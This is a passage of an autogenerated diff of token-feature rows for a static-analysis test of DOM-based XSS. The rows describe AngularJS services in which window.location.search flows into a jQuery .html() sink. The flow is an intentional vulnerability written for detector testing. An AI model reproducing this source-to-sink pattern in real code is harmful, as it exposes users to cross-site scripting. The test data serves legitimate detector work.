autogenerated/Xss/DomBasedXss/tst.js:150:37:150:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:150:36 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:150:36 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:150:36 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | functio ... } | CalleeFlexibleAccessPath | angular.module().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | functio ... } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16592,6 +115223,76 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:150:37:152:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:19 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:19 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:19 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:19 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | exceptional return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | functio ... l(v); } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | functio ... l(v); } | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | functio ... l(v); } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | functio ... l(v); } | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | functio ... l(v); } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:20:151:53 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:29:151:29 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:33 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:33 | $ | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:33 | $ | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:33 | $ | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:33 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | $("
    ") | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | exceptional return of $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | exceptional return of $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | exceptional return of $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:42 | exceptional return of $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:47 | $("
    ").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:47 | $("
    ").html | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:47 | $("
    ").html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:47 | $("
    ").html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:47 | $("
    ").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | $("
    ").html(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | $("
    ").html(v) | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | $("
    ").html(v) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | $("
    ").html(v) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | $("
    ").html(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | exceptional return of $("
    ").html(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | exceptional return of $("
    ").html(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | exceptional return of $("
    ").html(v) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | exceptional return of $("
    ").html(v) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:151:33:151:50 | exceptional return of $("
    ").html(v) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:151:35:151:41 | "
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:151:35:151:41 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:151:35:151:41 | "
